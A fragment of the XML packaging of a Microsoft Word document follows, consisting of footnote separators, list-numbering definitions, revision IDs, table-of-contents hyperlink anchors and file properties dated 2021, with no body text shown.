        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009D78D1" w:rsidRDefault="009D7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2E0E7F0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF94E7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4059E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF94E7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0187EC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF94E7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60E91961"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B4A0F2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3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4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5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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7F7458B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A548D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23"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="6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247F"/>
    <w:rsid w:val="000144AD"/>
    <w:rsid w:val="00016378"/>
    <w:rsid w:val="000222FB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07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4A5D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0D85"/>
    <w:rsid w:val="001F47C0"/>
    <w:rsid w:val="001F53FF"/>
    <w:rsid w:val="00201535"/>
    <w:rsid w:val="00201E9D"/>
    <w:rsid w:val="00201EC9"/>
    <w:rsid w:val="00204501"/>
    <w:rsid w:val="002076D1"/>
    <w:rsid w:val="0022049F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3D90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12BC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50C2"/>
    <w:rsid w:val="00306A4C"/>
    <w:rsid w:val="003071E1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30B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46360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8E8"/>
    <w:rsid w:val="00587B93"/>
    <w:rsid w:val="00591C75"/>
    <w:rsid w:val="00596F3F"/>
    <w:rsid w:val="005A35A5"/>
    <w:rsid w:val="005A4AA1"/>
    <w:rsid w:val="005A6239"/>
    <w:rsid w:val="005A6307"/>
    <w:rsid w:val="005B0011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7590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378C"/>
    <w:rsid w:val="007355A7"/>
    <w:rsid w:val="00742CA8"/>
    <w:rsid w:val="00747C8F"/>
    <w:rsid w:val="00760648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140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68CA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D78D1"/>
    <w:rsid w:val="009E2F72"/>
    <w:rsid w:val="009E56AD"/>
    <w:rsid w:val="009F2EB8"/>
    <w:rsid w:val="009F65CD"/>
    <w:rsid w:val="00A00F09"/>
    <w:rsid w:val="00A01ABA"/>
    <w:rsid w:val="00A021BD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3E3A"/>
    <w:rsid w:val="00B45115"/>
    <w:rsid w:val="00B47002"/>
    <w:rsid w:val="00B4765D"/>
    <w:rsid w:val="00B47BD0"/>
    <w:rsid w:val="00B513B0"/>
    <w:rsid w:val="00B5323C"/>
    <w:rsid w:val="00B542FC"/>
    <w:rsid w:val="00B554EE"/>
    <w:rsid w:val="00B56455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F2DFD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2E0E"/>
    <w:rsid w:val="00C769CF"/>
    <w:rsid w:val="00C76BE1"/>
    <w:rsid w:val="00C77963"/>
    <w:rsid w:val="00C77E34"/>
    <w:rsid w:val="00C805D2"/>
    <w:rsid w:val="00C82A25"/>
    <w:rsid w:val="00C82BA9"/>
    <w:rsid w:val="00C84133"/>
    <w:rsid w:val="00C844C7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02C8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739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8C3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507C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2721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B33BA6E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F9A85DFE-D24C-4B23-B109-E5213E0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FCCE-254C-4C5B-A2AC-0BB4C8D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806</Words>
  <Characters>4599</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>38</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>sparkle</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5395</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="138" baseType="variant"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_Toc497175227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_Toc497175226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_Toc497175225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_Toc497175224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_Toc497175223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_Toc497175222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_Toc497175221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_Toc497175220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_Toc497175219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_Toc497175218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_Toc497175217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_Toc497175216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_Toc497175215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_Toc497175214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_Toc497175213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_Toc497175212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_Toc497175211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_Toc497175210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_Toc497175209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_Toc497175208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_Toc497175207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_Toc497175206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_Toc497175205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9</cp:revision>
  <cp:lastPrinted>2010-02-27T00:38:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-07T07:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-07T12:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>